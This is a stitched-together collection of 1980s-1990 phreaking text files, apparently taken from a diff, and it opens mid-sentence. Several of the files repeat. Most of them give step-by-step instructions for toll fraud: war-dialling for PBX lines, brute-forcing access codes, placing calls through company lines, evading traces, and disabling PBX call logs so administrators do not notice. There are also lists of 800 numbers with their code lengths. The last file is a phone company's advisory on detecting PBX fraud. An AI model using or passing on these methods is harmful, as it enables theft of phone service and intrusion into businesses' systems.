sprint, MCI, etc access node, a person
who yells in the fone, the tone side of
a loop (nice), possibly a carrier if
your modem can "hear" tones that high,
or, hopefully, a PBX line. All your
scanning should be done between 6 PM
and 7 AM because between 7 AM and 6 PM,
many of these numbers will be answered
by the switchboard operator. When you
are checking out your results the next
day and come accross a dialtone, enter
some touch-tone (TM) digits. Depending
on which type of PBX equipment and the
length of the codes, after 3-8 digits
it should either give a busy signal,
a "reeler tone" (high-low tone), or
hang up on you, or possibly tell you
you entered a bad code. Now it is time
to write a hacker for this PBX. If the
codes are 3 or 4 digits, there will
most likely only be one code, but if
they are 5 or more digits there may
be more than one. If there are 3 or 4,
your hacker should dial the access
number, wait for a dialtone, then dial
the digits and wait for a second,
then dial a "1" (the reason for this
will be explained shortly), and then
"listen" for a dialtone. This would
be a hacker for a system that gives
a reeler tone, listening for the dial-
tone and hearing it would really mean
the presence of the reeler tone and
mean that a bad code had been entered.
The reason 1 is entered is to "quiet"
the dialtone" If it was a good code,
1XX or 1XXX will be valid extentions
on practically all PBX's. If your
system gives a re-order or hangs up
after a bad code, forget the one and
just listen for a dialtone, this will
be a good code. If there are 3 or 4
digits, they should be tried sequen-
tiallly (becuase there will probably
only be one good one), if there are
more, take your pick between random and
sequental. Now, when you (finally!!)
get a good code, you will call the
number and enter the code and be
confronted with a second dialtone. THIS
IS THE EXACT SAME DIALTONE THAT ANYONE
WHO PICKS UP A PHONE IN THAT PBX SYSTEM
GETS. The reason this is important is
because if they want to make an out-
going call, they will usually pick up
the fone and dial 8, 9, or sometimes 7,
and get another dialtone and then make
their call, local or long distance. And
you can do the same thing right now!
These numbers also make a good tool to
avoid being traced on telenet, etc, it
will just be traced back to the
company which owns the PBX.
Now for some phun with the PBX you
have just broken into to. You can dial
all extentions directly on it (which
is what local PBX'S are primarially
used for legitimately, unless the com-
pany has OUTWATS lines.) The most
phun extention of all is the PA system.
On some of these, you can get on the
PA (intercom) and actutually talk over
it from your house! It can be on almost
any extention though, so you may have
to hunt for it. On some, 797 or 1234
used to work, but those have mostly
been eliminated, not due to phreakers
but because people inside the company
were figuring them out and using them!
Some PBX's don't even have security
codes, you can just call up and dial
9 and call wherever you want. On a few
that I know of you enter the number
and then the code. If you want to know
what these systems "sound" like, there
are files on this and other systems
with long lists of WATS PBX numbers.
The local ones are much safer to hack
though because you are not making a
whole bunch of 800 calls which tends
to get bell very pissed. Also, I have
actually found modems and other wierd
things on some exchanges of PBX's, it
might be worthwhile to scan the numbers
inside the PBX once to see what you
find.
An important safety note: if you
heavily abuse a TBX and make many
outgoing calls on it, after a few
weeks (or whenever their fone bIll
shows up!) it is a good idea to lay off
of it for a couple of months or so
because they could get a trace on it
easilly, just like 800's. They will
usually just change the code, though.
One more interesing note, I once
found a PBX which had a direct link-
up to sprint! So by dialing 8 I got
a line to sprint, no access codes,
just area code and number. It's phun
to phuck up sprint and have them not
know who the hell you are or where the
hell you are!!
If you have any comments, sug-
gestions, corrections, or questions,
leave e-mail to Steve Dahl on any major
phreak board, I will be happy to reply.
Steve Dahl
5/1/84
This phile is copyrighted 1984 by
Steve Dahl and is not to be re-posted
without the author's consent! And I'm
not kidding!!
[Courtesy of Sherwood Forest ][ - (914) 359-1517]
[1-34, Last=34, Quit=Q] Read File #

+99
View File
@@ -0,0 +1,99 @@
PBX's (Private Branch Exchanges) and WATS
By Steve Dahl
Because of the danger of using a blue box, many phreakers have turned to MCI,
sprint, and other SCC's in order to get free calls. However, these services are
getting more and more dangerous, and even the relatively safe ones like
metrofone and all-net are beginning to trace and bust people who fraudulantly
use their services. However, (luckily), there is another, safer way. This is
the local and WATS PBX.
There will at least 1 line going out of the PBX to the telco set up for
outgoing calls only, and there will also be at least one incoming line to the
switchboard. This is what we are interested in. Some of the incoming lines are
always answered by the switchboard operator, but some will be answered by the
PBX equipmemt. It will usually answer with a dialtone, the tone will sound
different for different systems. Some even answer with a synthesized voice!
(These are very hard to find, though.) The ones which answer with a dialtone are
easy to find if you have a modem or hardware device which can "hear" what's
going on on the phone line.
To find these fun thingies, you will have to write a scanner program which
will dial each number in a pre- fix, either sequentially or in a random order,
it really doesn't matter, and "listen" on the line for a constant sound longer
than the normal length of a ring. This could be done manually but it would take
a hell of a long time. Whenever the program finds a number that makes a
constant tone longer than a ring, it should record the number in an array or
something. Now, this number can be one of a few things. A noisy answering
machine, a sprint, MCI, etc access node, a person who yells in the fone, the
tone side of a loop (nice), possibly a carrier if your modem can "hear" tones
that high, or, hopefully, a PBX line. All your scanning should be done between
6 PM and 7 AM because between 7 AM and 6 PM, many of these numbers will be
answered by the switchboard operator. When you are checking out your results
the next day and come accross a dialtone, enter some touch-tone (TM) digits.
Depending on which type of PBX equipment and the length of the codes, after 3-8
digits it should either give a busy signal, a "reeler tone" (high-low tone), or
hang up on you, or possibly tell you you entered a bad code. Now it is time to
write a hacker for this PBX. If the codes are 3 or 4 digits, there will most
likely only be one code, but if they are 5 or more digits there may be more than
one. If there are 3 or 4, your hacker should dial the access number, wait for a
dialtone, then dial the digits and wait for a second, then dial a "1" (the
reason for this will be explained shortly), and then "listen" for a dialtone.
This would be a hacker for a system that gives a reeler tone, listening for the
dial- tone and hearing it would really mean the presence of the reeler tone and
mean that a bad code had been entered. The reason 1 is entered is to "quiet"
the dialtone" If it was a good code, 1XX or 1XXX will be valid extentions on
practically all PBX's. If your system gives a re-order or hangs up after a bad
code, forget the one and just listen for a dialtone, this will be a good code.
If there are 3 or 4 digits, they should be tried sequen- tiallly (becuase there
will probably only be one good one), if there are more, take your pick between
random and sequental. Now, when you (finally!!) get a good code, you will call
the number and enter the code and be confronted with a second dialtone. THIS IS
THE EXACT SAME DIALTONE THAT ANYONE WHO PICKS UP A PHONE IN THAT PBX SYSTEM
GETS. The reason this is important is because if they want to make an out-
going call, they will usually pick up the fone and dial 8, 9, or sometimes 7,
and get another dialtone and then make their call, local or long distance. And
you can do the same thing right now! These numbers also make a good tool to
avoid being traced on telenet, etc, it will just be traced back to the company
which owns the PBX.
Now for some phun with the PBX you have just broken into to. You can dial all
extentions directly on it (which is what local PBX'S are primarially used for
legitimately, unless the com- pany has OUTWATS lines.) The most phun extention
of all is the PA system. On some of these, you can get on the PA (intercom) and
actutually talk over it from your house! It can be on almost any extention
though, so you may have to hunt for it. On some, 797 or 1234 used to work, but
those have mostly been eliminated, not due to phreakers but because people
inside the company were figuring them out and using them!
Some PBX's don't even have security codes, you can just call up and dial 9 and
call wherever you want. On a few that I know of you enter the number and then
the code. If you want to know what these systems "sound" like, there are files
on this and other systems with long lists of WATS PBX numbers. The local ones
are much safer to hack though because you are not making a whole bunch of 800
calls which tends to get bell very pissed. Also, I have actually found modems
and other wierd things on some exchanges of PBX's, it might be worthwhile to
scan the numbers inside the PBX once to see what you find.
An important safety note: if you heavily abuse a TBX and make many outgoing
calls on it, after a few weeks (or whenever their fone bIll shows up!) it is a
good idea to lay off of it for a couple of months or so because they could get a
trace on it easilly, just like 800's. They will usually just change the code,
though. One more interesing note, I once found a PBX which had a direct link-
up to sprint! So by dialing 8 I got a line to sprint, no access codes, just
area code and number. It's phun to phuck up sprint and have them not know who
the hell you are or where the hell you are!!
If you have any comments, suggestions, corrections, or questions, leave
e-mail to Steve Dahl on any major phreak board, I will be happy to reply.
Steve Dahl
5/1/84
This phile is copyrighted 1984 by Steve Dahl and is not to be re-posted
without the author's consent! And I'm not kidding!!
[Courtesy of Sherwood Forest ][ - (914) xxx-xxxx]
+110
View File
@@ -0,0 +1,110 @@
ZDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD?
CBDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDB4
33 CHiNA CHiNA 33
33 R.O.L.M. Sorcerer XII PBX Remote System Control 33
33 33
33 By: The Conflict 33
CADDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDA4
0DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDY
INTRO : I know right off you people are thinking, "How in the Hell
do I know if I am calling a R.O.L.M. Sorcerer XII PBX?".
Well, that will be covered here, along with all system
commands available on that PBX.**Of course, this file is
meant for educational purposes only. We at CHiNA hereby
waive any legal reprimand due to misuse of the information
contained in this file (so there!).**
HOW : A R.O.L.M. Sorcerer XII PBX has a unique answer; thus, it
IT is quite distinguishable from most other PBX's. I will list
SOUNDS some PBX's with similar answer devices at the end of this
section. The Sorcerer XII's answer consists of: A.) No
ring, B.) A short diverting tone of 2600 Hz, and C.) A
standard, no interrupt AT&T 4.2c dial tone. Unfortunately,
there are four known PBX's that have a similar answer device,
but not exact. These four are as follows: A.) R.O.L.M.
Sorcerer III, B.) SouthWestern Bell WizSys I, C.) Northern
Telecom SL-Net V, and D.) Siemans WebLink v.Ia. The slight
differences between these systems answer devices are the
dial tones. The dial differ either in tone, volume, or
interrupt/no interrupt. With practice, you will find the
Sorcerer XII easy to distinguish.
WHAT : Now, most often Sorcerer XII requires a four digit code, but
TO DO this can be altered at the source, so it is not entirely
consistent. To be able to utilize the Remote System Control
(RSC from here out) commands, you must obtain the System
Command Code. The System Command Code consists of the
original number of digits plus a two digit authorization
check. Thus, if we were dealing with a four digit Sorcerer
XII system, we would find the four digit System Command Code
followed by two more digits. *How do you know if you have the
first set of the SCC?* A four tone confirmation, similar to
the one given by ASPEN VMNetworks, is given when you have the
first digit set of the SCC; then, you must discover the two
digit confirmation code. The confirmation code is updated
every week. Finding the SCC is not going to be easy, as you
can not utilize a cutesy code hacker on your computer.
Essentially, the process will take dedicated hand hacking,
and scanning for that matter.
SYSTEM: Since this is a PBX, there are no voice instructions; thus,
COMMAND you must know what the hell you're doing! After you have
LEVEL obtained the correct confirmation code, two short beeps are
transmitted. This is your cue; you're in! The commands are
two digits followed by the asterisk (*) key. Since there are
many commands, I will list only those which are essential to
your life and needs. You can experiment with the other ones.
07* - input 1, 2, or 3; alters error transmission. 1 is fake
carrier, 2 is fast-busy, 3 is sweep-siren.
19* - allows removal of codes from the programed code array.
You must enter the code to be removed, followed by the
pound key (#).
20* - allows insertion of codes. You must input the code,
followed by the pound key (#). Be careful, as a
precise log of all code insertions is kept.
43* - enables calls to toll numbers, such as 0700, 1900, and
976.
44* - disables calls to toll numbers. Be sure to disable
the function immediately after you are done with it.
If it is left on, the administrator knows what's going
on and will investigate.
73* - enables making log of all calls placed through Sorcerer
XII lines.
74* - disables making log of all calls placed through
Sorcerer XII lines. Once again, disable 73 if you use
it, as it is obvious to the administrator what's going
on.
99* - disconnect from the system command level. Make sure
to do this before hanging up, as it will hang the PBX,
and things will definantly be switched around.
Have fun, be careful, and take it easy. All the information included
should be enough to provide hours of safe enjoyment. If you have any
questions for CHiNA concerning anything, give us a call at one of the
below-listed CHiNA Nodes. Spread this around!!!
Later,
The Conflict
<CHiNA>
Thanks go out to Maxwell Smart for acquiring a partial R.O.L.M.
manual; Count Zero for being a swell guy; The Viper for giving us a
'home'; Monalisa Overdrive for anti-procrastination support; and last
but not least, NAP/PA for instilling in us a realization that we do
not want to do nothing!
/e
+- Shamelessly Leeched from The Mudd Club -+

+133
View File
@@ -0,0 +1,133 @@
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Chaos Inc - PBX Hacking Part I
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Written by : Instinct
05/20/90
This File will Contain basic methods of finding, hacking, and
using PBX's. I will not assume any liability written in this text
file, in other words, it is for INFORMATION purposes only.
Ok, as phreaking continues to become more of a hazard,
Safer ways of obtaining 'free' calls are highly sought after.
A While back, a friend of mine gave me a PBX, and it has lasted
ever since. But the more I used it, the more I wanted others,
"Just in case" <the other went down>, therefore, I created
My own method of finding, hacking, and using various other
PBX's (Private Branch eXchange)
A PBX quite simply, is a company owned 'Service' that allows
Employee's or anyone with the correct code, to call Long Distance
and speak with others as far away as China. These PBX's generally
do not contain anything like ANI, or tracing methods, so they are
more the likely safer then hacking codes.
PBX's serve other purposes such as to allow intra-building
paging and PA system use. Finding the codes to access the PA
system can be fun/useful too. Some owner's pay a flat fee for
the PBX because of the sheer number of legitimate calls made
on the services by employees. This is great for the PBX hacker,
because this means they are less likely to be caught or have any
CLID or ANI services on the line.
The Set-Up - You're gonna need for this -
(1) Phone Book
(1) CPU
(1) Scanner Program (FHacker)
(1) Hacking Program (Code Thief)
(1) Telefone - for Information (411)
The Approach -
Larger Companies (such as IBM, NEC, USR) are more
Then likely the targets which you will want to hit.
Open your phone book places like 'IBM' and 'NEC' etc,
until you find a listing of their different services,
such as Billing Information, Repair, Support, etc.
Once finding these, list them, and find which Digits
are occuring the most (like is repair was 777-2345, and
information was 777-8375). In that example, their PBX
Would probably be on the '777' Number.
Scanning -
The Next thing you wanna do, is load up your scanner
and when it asks you for the random `Template' Put something
to the effect of '777-XXXX'. Start scanning, and keep a record
of 'Tones' you get (That's right, they don't produce carriers,
therefore you must MANUALLY listen, and record them). After
Acquiring a sufficient number of tones, go to you code hacker.
Hacking -
This takes about 10 minutes to perfect. Enter the number
in the set-up, when it asks for time between dialing, and
inputting the code, experiment with 1, then 2, etc. once you
get that right, it'll ask you for the 'code length'. When you
get to this part, it is easiest to try 4 first, then 5, etc.
Companies will generally only have 6 digit codes on their PBX.
After putting in the code, PBX's will usually have a digit to
get an outgoing line on. Most use '9', but I'm sure it can
differ. After finding which one produces a '2nd tone' that's
all you need <bear in mind that when looking for the 2nd tone,
you MUST have already hacked out a code in which to call out
with>. Next set your hacking time, attempts, etc.
Using the PBX -
This is the most tedious part of using a PBX. You're
Going to need a macro, in the macro, put something to
the effect of 'ATDT PBXHERE,,,,CODE,9, . After doing
this, you can look LEGIT to your parents, by entering
the Board numbers as such 1(XXX)XXX-XXXX. No need in
having those little +'s, or !'s. Now, you MUST have a
telephone hooked up with your Modem. Hit the macro, the
modem will dial, and the code will go, etc. While it is
doing this, Pick up the phone, when it is done spewing out
the last digit (the 9), Hit return (to disconnect it) and
immmediately dial your destination. The PBX I use gives you
roughly 4 seconds to dial after pressing 9.
(Look for a PBX scanner from Chaos Inc in the near future)
Closing -
Enjoy the file, it is easy to understand, easy
to do, and was VERY fun to write.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Chaos Inc - 199O
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
The Boards -
Solsbury Hill
The Iron Curtain
Ends of Sanity
Infinite Intoxication
The Late-Night Prowl
The Rocky Mts.
The Metal's Edge
+139
View File
@@ -0,0 +1,139 @@
***************************************
** **
** PRIVATE BRANCH EXCHANGES **
** **
** WRITTEN BY **
** **
** [> THE SNIPER <] **
** **
** COMPLETED : AUG 8, **
** 10:51 PM **
** **
***************************************
+----------------------------+ ! DIGITAL LOGIC DATA CENTER !
! [305] 395-6906 !
+----------------------------+ ! THE PITSTOP !
! [504] 774-7126 !
+-----------------------------+
(FORMATTED 40 COLS UPPERCASE)
PRIVATE BRANCH EXCHANGES
(HENCEFORTH ACKNOWLEDGED AS "PBX'S")
ARE TELEPHONE SYSTEMS SET UP BY LARGE
CORPORATIONS TO MAKE LONG DISTANCE
PHONE CALLS AT A LOWER-THAN-AT&T PRICE.
HERE'S WHAT AND HOW A PBX WORKS:
MANY PEOPLE ARE FAMILIAR WITH TOLL-
FREE NUMBERS (1-800-XXX-XXXX) THAT
ALLOW DIAL UP FROM ANYWHERE (WELL,
ALMOST ANYWHERE.. DEPENDING ON THE TYPE
OF WATS LINE THE COMPANY GOT.. BUT THIS
IS NOT IMPORTANT) IN THE UNITED STATES.
WATS (WIDE-AREA-TELEPHONE-SERVICE)
LINES ARE OFFERED BY AT&T AT A FLAT
RATE OF MAYBE $2000 PER MONTH WHIC
ALLOWS AN UNLIMITED AMOUNT OF LONG
DISTANCE CALLS TO THAT COMPANY. 2000
DOLLARS A MONTH MAY SEEM A LOT TO YOU
AND ME, BUT TO A COMPANY THAT NEEDS TO
TALK TO DISTRIBUTORS, SALESMEN,
OTHER FRANCHISES, ETC. IT IS A VERY
SMALL PRICE TO PAY. (THE WATS LINE I
JUST DESCRIBED IS CALLED AN OUTWATS
LINE THAT IS, A PHONE LINE THAT ONLY
ALLOWS OUTWARD CALLS). NOW A PBX WORKS
ALMOST THE SAME WAY MCI, SPRINT, AND
OTHER LONG DISTANCE SERVICES WORK. IT
USES AN INWATS (INWARD WATS [ANOTHER
1-800 NUMBER]) LINE TO ACCEPT ONE OF
THEIR EMPLOYEES PHONE CALLS. THEN A
COMPUTER PICKS UP THE PHONE AND SENDS
OUT A TONE. THE EMPLOYEE (OR YOU)
ENTERS A SIMPLE ACCESS CODE (USUALLY 3
OR 4 DIGITS LONG) AND THEN YOUR PHONE
NUMBER YOU ARE TRYING TO CALL.
IF THE CODE IS APPROVED THE
COMPUTER SWITCHES YOU TO AN OUWTATS
LINE AND COMPLETES YOUR CALL, AND
POOF! YOU'RE CONNECTED TO THE OTHER
END.
PBX'S USED TO BE WITHOUT A CODE.
THAT IS, ALL YOU'D DO IS CALL THE
800 NUMBER, AND THEN DIAL THE LONG
DISTANCE NUMBER. BUT COMPANIES SOON
FOUND OUT THAT THEIR PHONES WERE BEING
USED BY PEOPLE OTHER THAT COMPANY
EMPLOYEES, SO THEY ADDED THE CODE TO
TRY TO KEEP THESE UNWANTEDS OUT.
HERE IS A LIST OF A FEW PBX'S
FROM A TEXT PHILE CALLED "PHREAKING
TUTORIAL II". I THOUGHT YOU MIGHT
LIKE THESE TO HELP GET YOU STARTED.
***************************************
** **
** DISCLAIMER **
** **
***************************************
ALTHOUGH THIS FILE TOUCHES
SENSITIVE AREAS ABOUT THE PHONE COMPANY
IT IS ONLY AN INFORMATIVE FILE
EXPLAINING HOW THE PBX WORKS. THE
AUTHOR TAKES NO RESPONSIBILITY FOR
ILLEGALITIES CAUSED BY READERS OF THE
FILE.
PBX'S (80-COL):
1-800-221-1950 1-800-858-9000 3 digits
1-800-221-5430 1-800-843-0698 9 digits
1-800-221-5665 1-800-682-4000 6 digits
1-800-221-5670 1-800-654-8494 6 digits
1-800-221-8190 4 digits 1-800-641-4713 3WAY 8-1-AC
1-800-223-7854 1-800-638-6402
1-800-243-7650 6 digits 1-800-637-4663
1-800-255-2255 1-800-621-1703
1-800-321-0327 4 digits 1-800-621-1506
1-800-321-0424 1-800-547-6754 6 digits
1-800-321-0845 6 digits 1-800-547-6017
1-800-323-4313 1-800-547-1784
1-800-327-0005 1-800-543-7168 8 digits
1-800-327-0326 4444-9 1-800-527-3511 8 digits
1-800-327-2703 1-800-553-8432
1-800-327-6713 4 digits 1-800-424-9826
1-800-327-9136 4 digits 1-800-521-8400 8 digits
1-800-327-9895 7 digits 1-800-368-4222
1-800-328-1224 088759 1-800-368-5963
1-800-331-4100 1-800-356-0001 1-2-3...2-3-4
1-800-343-1319 1-800-343-1844 4 digits
1-800-348-1800 1-800-245-4890 4 digits
1-800-328-7112 4 digits 1-800-227-3414 4 digits
1-800-462-6471 5 digits 1-800-322-1415 6 digits
1-800-521-1674 4 digits 1-800-327-2731 6 digits
1-800-252-5879 8 digits 1-800-345-0008 7 digits
1-800-245-7508 5 digits 1-800-526-5305 8 digits
1-800-323-3027 6 digits 1-800-242-1122
1-800-621-4611 1-800-325-3075
1-800-336-6000 1-800-221-1950
1-800-323-8126 1-800-325-7222
Leeched From Oblivion ...
Press a key...
The Phone Booth [Phreak]: 37 of 37
Captured From:
THE IMAGINATION FACTORY BBS (513)-787-3777
24 hours - 7 days
+97
View File
@@ -0,0 +1,97 @@
PBX's (Private Branch Exchanges) and WATS
By Steve Dahl
Because of the danger of using a blue box, many phreakers have turned to MCI,
sprint, and other SCC's in order to get free calls. However, these services are
getting more and more dangerous, and even the relatively safe ones like
metrofone and all-net are beginning to trace and bust people who fraudulantly
use their services. However, (luckily), there is another, safer way. This is
the local and WATS PBX.
There will at least 1 line going out of the PBX to the telco set up for
outgoing calls only, and there will also be at least one incoming line to the
switchboard. This is what we are interested in. Some of the incoming lines are
always answered by the switchboard operator, but some will be answered by the
PBX equipmemt.It will usually answer with a dialtone, the tone will sound
different for different systems. Some even answer with a synthesized voice!
(These are very hard to find, though.) The ones which answer with a dialtone
are easy to find if you have a modem or hardware device which can "hear" what's
going on on the phone line.
To find these fun thingies, you will have to write a scanner program which
will dial each number in a pre- fix, either sequentially or in a random order,
it really doesn't matter, and "listen" on the line for a constant sound longer
than the normal length of a ring. This could be done manually but it would take
a hell of a long time. Whenever the program finds a number that makes a
constant tone longer than a ring, it should record the number in an array or
something. Now, this number can be one of a few things. A noisy answering
machine, a sprint, MCI, etc access node, a person who yells in the fone, the
tone side of a loop (nice), possibly a carrier if your modem can "hear" tones
that high, or, hopefully, a PBX line. All your scanning should be done between
6 PM and 7 AM because between 7 AM and 6 PM, many of these numbers will be
answered by the switchboard operator. When you are checking out your results
the next day and come accross a dialtone, enter some touch-tone (TM) digits.
Depending on which type of PBX equipment and the length of the codes, after 3-8
digits it should either give a busy signal, a "reeler tone" (high-low tone), or
hang up on you, or possibly tell you you entered a bad code. Now it is time to
write a hacker for this PBX. If the codes are 3 or 4 digits, there will most
likely only be one code, but if they are 5 or more digits there may be more
than one. If there are 3 or 4, your hacker should dial the access number, wait
for a dialtone, then dial the digits and wait for a second, then dial a "1"
(the reason for this will be explained shortly), and then "listen" for a
dialtone. This would be a hacker for a system that gives a reeler tone,
listening for the dial tone and hearing it would really mean the presence
of the reeler tone and mean that a bad code had been entered.The reason 1 is
entered is to "quiet" the dialtone" If it was a good code, 1XX or 1XXX will be
valid extentions on practically all PBX's. If your system gives a re-order or
hangs up after a bad code, forget the one and just listen for a dialtone, this
will be a good code.
If there are 3 or 4 digits, they should be tried sequen- tiallly (becuase there
will probably only be one good one), if there are more, take your pick between
random and sequental. Now, when you (finally!!) get a good code, you will call
the number and enter the code and be confronted with a second dialtone. THIS IS
THE EXACT SAME DIALTONE THAT ANYONE WHO PICKS UP A PHONE IN THAT PBX SYSTEM
GETS. The reason this is important is because if they want to make an out-
going call, they will usually pick up the fone and dial 8, 9, or sometimes 7,
and get another dialtone and then make their call, local or long distance. And
you can do the same thing right now! These numbers also make a good tool to
avoid being traced on telenet, etc, it will just be traced back to the company
which owns the PBX.
Now for some phun with the PBX you have just broken into to.You can dial all
extentions directly on it (which is what local PBX'S are primarially used for
legitimately, unless the com- pany has OUTWATS lines.) The most phun extention
of all is the PA system. On some of these, you can get on the PA (intercom) and
actutually talk over it from your house! It can be on almost any extention
though, so you may have to hunt for it. On some, 797 or 1234 used to work, but
those have mostly been eliminated, not due to phreakers but because people
inside the company were figuring them out and using them!
Some PBX's don't even have security codes, you can just call up and dial 9 and
call wherever you want. On a few that I know of you enter the number and then
the code. If you want to know what these systems "sound" like, there are files
on this and other systems with long lists of WATS PBX numbers.The local ones
are much safer to hack though because you are not making a whole bunch of 800
calls which tends to get bell very pissed. Also, I have actually found modems
and other wierd things on some exchanges of PBX's, it might be worthwhile to
scan the numbers inside the PBX once to see what you find.
An important safety note: if you heavily abuse a TBX and make many outgoing
calls on it, after a few weeks (or whenever their fone bIll shows up!) it is a
good idea to lay off of it for a couple of months or so because they could get
a trace on it easilly, just like 800's. They will usually just change the code,
though. One more interesing note, I once found a PBX which had a direct link-
up to sprint! So by dialing 8 I got a line to sprint, no access codes, just
area code and number. It's phun to phuck up sprint and have them not know who
the hell you are or where the hell you are!!
If you have any comments, suggestions, corrections, or questions, leave
e-mail to Steve Dahl on any major phreak board, I will be happy to reply.
Steve Dahl
5/1/84
+86
View File
@@ -0,0 +1,86 @@
FRAUD
PBX USERS FALLING VICTIM TO DETERMINED RIP-OFF SCHEMES
"Dumpster Divers" and disenchanted employees can run up
costly bills
PBX fraud has turned into a thriving business for the
criminals running up millions of dollars worth of phony
calls, and a nightmare for the companies that are being
victimized. Since the user companies - not the switch
manufacturers who have been sued unsuccessfully - are
responsible for fighting this increasingly wide-spread
crime, we offer descriptions of the fraudulent calling
techniques and some tips for defeating them.
PBX REMOTE ACCESS
Any customer offering remote PBX access via 800 service
can be victimized by this kind of fraud, which is
impossible to prevent totally.
Although many of the 800 numbers used for remote PBX
access are not published, they, like the access codes they
work with, may be illegally obtained and sold. If no code
is needed to gain remote access, the fraud is even more
easily accomplished. Those numbers frequently ring through
to a tone instead of an operator. Once the 800 number is
dialed and an access code is entered, a dial tone is
provided that allows illegal callers to dial anywhere in
the world.
Access codes may be obtained in a number of ways. That is
where such industrious types as "Dumpster Divers" enter
the picture. As their name suggests, Dumpster Divers
actually comb through reams of trash in order to find
access codes; the numbers may then be used by them or sold
to other illicit users for up to $10,000. Terminated or
disgruntled employees may also have access to the
numbers.
The more technically-minded criminals dial up 800 numbers
and set computers to work dialing hundreds of random
number combinations per minute until they hit a legitimate
access code combination.
The first step in combating this form of fraud is to use
access codes. In large businesses with lots of turnover,
change the codes at least monthly. Change them, as well,
if it is determined that a terminated or disgruntled employee
may have an ax to grind.
A few words to the wise: Make sure the access codes are
comprised of at least six or seven digits; thoughtless
combinations like R1-2-3S can be easily ferreted out.
Monitoring call patterns closely can also help weed out
fraudulent offenders. Actually, this defense tactic is
applicable against any PBX fraud technique. Keep on the
lookout for abnormal calling, such as late-night calling,
long-duration calls and repeated calls to specific areas.
PBXs should also be programmed to establish a threshold
for the number of calls allowed within a given time period
using any one access code and to disable that access code
when the threshold is reached.
INMATE FRAUD
If it is true that idle hands are the Devil's workshop,
it should come as no surprise that prisons have become
a major center of operations for PBX-based fraud. Inmates
are representing themselves as New England Telephone
employees in order to gain access to an outside line
through business customers' switchboards. They call
PBX attendants collect, alleging that they are working
in the area and will need to pass calls through the
attendant for completion.
The fact of the matter is this: New England Telephone
personnel do not make collect calls to any of our
subscribers, and they should not accept such calls.
+112
View File
@@ -0,0 +1,112 @@
***************************************
** **
** PRIVATE BRANCH EXCHANGES **
** **
** WRITTEN BY **
** **
** [> THE SNIPER <] **
** **
** COMPLETED : AUG 8, 1986 **
** 10:51 PM **
** **
***************************************
+-----------------------------+
! DIGITAL LOGIC DATA CENTER !
! [305] 395-6906 !
+-----------------------------+
! THE PITSTOP !
! [504] 774-7126 !
+-----------------------------+
(FORMATTED 40 COLS UPPERCASE)
PRIVATE BRANCH EXCHANGES
(HENCEFORTH ACKNOWLEDGED AS "PBX'S") ARE TELEPHONE SYSTEMS SET UP BY LARGE
CORPORATIONS TO MAKE LONG DISTANCE PHONE CALLS AT A LOWER-THAN-AT&T PRICE.
HERE'S WHAT AND HOW A PBX WORKS:
MANY PEOPLE ARE FAMILIAR WITH TOLL-FREE NUMBERS (1-800-XXX-XXXX) THAT
ALLOW DIAL UP FROM ANYWHERE (WELL, ALMOST ANYWHERE.. DEPENDING ON THE TYPE
OF WATS LINE THE COMPANY GOT.. BUT THIS IS NOT IMPORTANT) IN THE UNITED STATES.
WATS (WIDE-AREA-TELEPHONE-SERVICE) LINES ARE OFFERED BY AT&T AT A FLAT
RATE OF MAYBE $2000 PER MONTH WHIC ALLOWS AN UNLIMITED AMOUNT OF LONG
DISTANCE CALLS TO THAT COMPANY. 2000 DOLLARS A MONTH MAY SEEM A LOT TO YOU
AND ME, BUT TO A COMPANY THAT NEEDS TO TALK TO DISTRIBUTORS, SALESMEN,
OTHER FRANCHISES, ETC. IT IS A VERY SMALL PRICE TO PAY. (THE WATS LINE I
JUST DESCRIBED IS CALLED AN OUTWATS LINE THAT IS, A PHONE LINE THAT ONLY
ALLOWS OUTWARD CALLS). NOW A PBX WORKS ALMOST THE SAME WAY MCI, SPRINT, AND
OTHER LONG DISTANCE SERVICES WORK. IT USES AN INWATS (INWARD WATS [ANOTHER
1-800 NUMBER]) LINE TO ACCEPT ONE OF THEIR EMPLOYEES PHONE CALLS. THEN A
COMPUTER PICKS UP THE PHONE AND SENDS OUT A TONE. THE EMPLOYEE (OR YOU)
ENTERS A SIMPLE ACCESS CODE (USUALLY 3 OR 4 DIGITS LONG) AND THEN YOUR PHONE
NUMBER YOU ARE TRYING TO CALL.
IF THE CODE IS APPROVED THE COMPUTER SWITCHES YOU TO AN OUWTATS
LINE AND COMPLETES YOUR CALL, AND POOF! YOU'RE CONNECTED TO THE OTHER
END.
PBX'S USED TO BE WITHOUT A CODE. wHAT IS, ALL YOU'D DO IS CALL THE
800 NUMBER, AND THEN DIAL THE LONG DISTANCE NUMBER. BUT COMPANIES SOON
FOUND OUT THAT THEIR PHONES WERE BEINGUSED BY PEOPLE OTHER THAT COMPANY
EMPLOYEES, SO THEY ADDED THE CODE TO TRY TO KEEP THESE UNWANTEDS OUT.
HERE IS A LIST OF A FEW PBX'S FROM A TEXT PHILE CALLED "PHREAKING
TUTORIAL II". I THOUGHT YOU MIGHT LIKE THESE TO HELP GET YOU STARTED.
***************************************
** **
** DISCLAIMER **
** **
***************************************
ALTHOUGH THIS FILE TOUCHES SENSITIVE AREAS ABOUT THE PHONE COMPANY
IT IS ONLY AN INFORMATIVE FILE EXPLAINING HOW THE PBX WORKS. THE
AUTHOR TAKES NO RESPONSIBILITY FOR ILLEGALITIES CAUSED BY READERS OF THE
FILE.
PBX'S (80-COL):
1-800-221-1950 1-800-858-9000 3 digits
1-800-221-5430 1-800-843-0698 9 digits
